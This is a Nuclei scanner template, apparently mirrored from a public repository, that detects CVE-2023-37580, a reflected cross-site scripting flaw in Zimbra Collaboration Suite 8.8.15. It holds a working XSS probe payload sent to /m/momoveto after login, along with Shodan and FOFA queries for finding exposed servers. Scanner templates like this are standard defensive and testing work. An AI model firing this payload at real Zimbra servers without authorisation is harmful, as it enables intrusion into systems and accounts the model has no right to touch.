daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2023/CVE-2023-37580.yaml

66 lines
2.3 KiB
YAML
Raw Blame History

id: CVE-2023-37580
info:
name: Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Zimbra Collaboration (ZCS) 8 before 8.8.15 Patch 41 allows XSS in the Zimbra Classic Web Client.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Apply the latest security patches or upgrade to a non-vulnerable version of Zimbra Collaboration Suite (ZCS).
reference:
- https://github.com/Zimbra/zm-web-client/pull/827
- https://blog.zimbra.com/2023/07/security-update-for-zimbra-collaboration-suite-version-8-8-15/
- https://nvd.nist.gov/vuln/detail/CVE-2023-37580
- https://wiki.zimbra.com/wiki/Security_Center
- https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-37580
cwe-id: CWE-79
epss-score: 0.30867
epss-percentile: 0.96974
cpe: cpe:2.3:a:zimbra:zimbra:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: zimbra
product: zimbra
shodan-query:
- http.favicon.hash:475145467
- http.favicon.hash:"475145467"
fofa-query: icon_hash="475145467"
tags: cve2023,cve,zimbra,xss,authenticated,kev
http:
- raw:
- |
POST /zimbra/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
loginOp=login&username={{username}}&password={{password}}&client=mobile
- |
GET /m/momoveto?st="><img%20src=x%20onerror=alert(document.domain)> HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- '<img src=x onerror=alert(document.domain)>'
- 'id="zMoveForm"'
condition: and
- type: word
part: header_2
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a00473045022048e3c2c16faae78f075fb3316202679a06f3ca15d9e665cf8b6865292449a1200221009e80beed07909007baf52bc9724dcc11c5b3700428afd7875003fa9b6fb5ce67:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink